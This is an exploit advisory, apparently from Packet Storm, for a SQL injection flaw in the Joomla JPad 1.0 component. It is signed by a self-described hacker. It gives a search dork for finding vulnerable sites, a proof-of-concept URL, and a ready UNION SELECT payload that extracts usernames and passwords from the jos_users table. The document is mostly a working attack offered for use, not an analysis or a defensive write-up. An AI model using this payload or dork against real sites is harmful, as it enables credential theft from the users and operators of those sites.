The Joomla Jpad component version 1.0 suffers from a SQL injection vulnerability.
b72317489536afc47cd10404a792d0fa9c885d3a63245b45330c76c26cf8b92f#########################################################
# #
# Joomla Component JPad Remote SQL Injection #
# #
#########################################################
########################################
[*] Founded by : His0k4 (Algerian HaCkeR);
[*] Contact: His0k4[at]gmail.com
[*] Greetz : All friends & muslims HaCkeRs :)
########################################
[*] Script_Name: "Joomla"
[*] Component_Name: "JPad"
########################################
[*] DORK: allinurl:com_jpad
########################################
[*] P.O.C: /index.php?option=com_jpad&task=edit&Itemid=39&cid=[SQL]
[*] Example: /index.php?option=com_jpad&task=edit&Itemid=39&cid=-1 UNION ALL SELECT 1,2,3,concat_ws(0x3a,username,password),5,6,7,8 from jos_users--
[*] Note : You have to register an account in the site.
########################################
side note:
<name>JPad</name>
<creationDate>31/06/2007</creationDate>
<author>Theo van der Sluijs</author>
<copyright>(c) 2007 VanderSluijs.nl</copyright>
<authorEmail>theo@vandersluijs.nl</authorEmail>
<authorUrl>www.vandersluijs.nl</authorUrl>
<version>1.0</version>
<description>Component to create notepad files. (see about)</description>
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed